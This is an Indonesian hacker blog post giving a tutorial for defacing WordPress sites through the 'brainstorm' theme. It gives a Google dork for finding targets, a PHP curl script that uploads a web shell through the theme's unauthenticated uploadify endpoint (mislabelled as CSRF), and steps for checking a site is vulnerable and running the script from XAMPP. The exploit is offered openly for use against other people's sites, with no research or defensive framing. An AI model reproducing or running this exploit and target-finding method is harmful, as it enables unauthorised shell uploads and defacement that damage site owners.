Assalamualaikum :v
Berjumpa lgi bersama sya si tamvan Mr.3RR0R
Sekarang sya akan membahas tutorial deface dengan "Wordpress themes brainstorm"
Entah ini exploit baru atau lama , cuman nemu doang dari blog sebelah :v
ok gan langsung aja pelajari tutor di bwah ini
Dork:
inurl:/wp-content/themes/brainstorm
CSRF :
<?php
$uploadfile="shell.php";
$ch = curl_init("www.contoh.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Pertama gunakan dork diatas di google
klau sudah bug pathnya liat di bwah
www.contoh.com/(path)/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
klau gambarnya kyak gini , berarti vulnerable :v
Klau gambarnya kyak gitu , sisa gunakan CSRF yg diatas , gunakan xampp :v .
OK gitu aja gan , klau ada yg kurang di pahami silahkan isi komentar di bwah :D
Happy Enjoy :D
Waasalamualaikun gan :v
Source : TKJ Cyber Art
Thanks To : PhantomGhost - Sulawesi IT Sec
Facebook : https://www.facebook.com/marselERROR
Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/
0 Comment to "Tutorial Deface dengan WP Themes Brainstorm Arbitrary File"
Posting Komentar